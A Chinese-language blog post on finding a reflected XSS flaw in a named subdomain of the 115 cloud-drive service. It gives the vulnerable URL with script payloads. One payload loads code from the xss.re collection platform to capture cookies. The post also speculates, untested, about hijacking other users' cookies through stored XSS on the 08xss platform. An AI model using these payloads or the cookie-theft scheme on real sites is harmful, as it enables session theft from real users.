记一次挖掘115网盘反射型xss，08xss的储存型xss

记一次对115分站简单绕过过滤继续实现xss，08xss平台也中枪！！

115反射型xss url:http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=

http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=<script>alert(/xss/)</script>

插入这个代码看

没弹窗我们看看源代码

在这里小伙伴们想到了什么？再来插入一次xss？对的，就是这样！！

看看源代码

===============08开始躺枪=========================

我前些天在08xss平台注册了个账号正好测试下能不能接收cookie

把url换成

http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=<script>alert(/xss/)</script><scriptsrc=http://xss.re/xxx></script>;

看看源代码吧！

入库就对了！！哇哈哈！！~~

下面属于我的想象

08平台这个xss能不能利用呢？

我想到几点，首先这个平台的项目都是有顺序的，在某网站插入代码

www.xx.com/info.php?id=<script src=http://xss.re/别人的项目代码></script>

<script src=http://xss.re/我的项目代码></script>

也就是说先执行别人的代码然后别人查看这个项目就中招了。

这是我的想象，具体的没怎么测试，这个有待挖掘，这个项目是顺序的，我的是1，下一个别人创建的就是2了，这样利用起来方便，就是不知道能不能执行成功。

==============================================

上面是去年写的

下面是我刚刚猜想的，

既然代码是可以执行的，也就是说插入别人的代码在前面就先弹别人的？

插入http://www.baidu.com/info.php?id=<script scr=08xss.re/13></script><script scr=08xss.re/14></script>

是先执行别人的，但是在08xss平台里面，你先执行别人的代码有用吗？

你执行完之后是不是你的cookie发到别人的xss平台里面？

所以说得先让别人查看他的项目然后劫持到他的coookie，这个也不好利用

具体的你们自己测试吧，我懒得看这种。想多了头疼